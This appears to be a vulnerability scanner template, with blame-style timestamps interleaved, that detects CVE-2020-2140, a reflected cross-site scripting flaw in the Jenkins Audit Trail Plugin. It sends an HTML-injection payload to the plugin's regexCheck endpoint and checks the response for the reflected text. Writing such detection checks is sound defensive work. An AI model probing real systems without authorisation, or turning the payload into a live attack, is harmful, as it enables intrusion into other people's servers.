2020-09-15 19:25:55 +00:00
id : cve-2020-2140
2020-08-30 17:42:46 +00:00
info :
author : j3ssie/geraldino2
2020-08-31 07:38:04 +00:00
name : Jenkin AuditTrailPlugin XSS
2020-08-30 17:42:46 +00:00
severity : medium
2020-08-31 07:38:04 +00:00
description : Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
# Source:- https://nvd.nist.gov/vuln/detail/CVE-2020-2140
2020-08-30 17:42:46 +00:00
requests :
2020-08-31 07:38:04 +00:00
- method : GET
path :
2020-09-04 05:55:13 +00:00
- "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
- "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
2020-08-31 07:38:04 +00:00
matchers-condition : and
matchers :
- type : word
2020-08-30 17:42:46 +00:00
words :
- <h1>sample
2020-08-31 07:38:04 +00:00
part : body
- type : status
status :
- 200
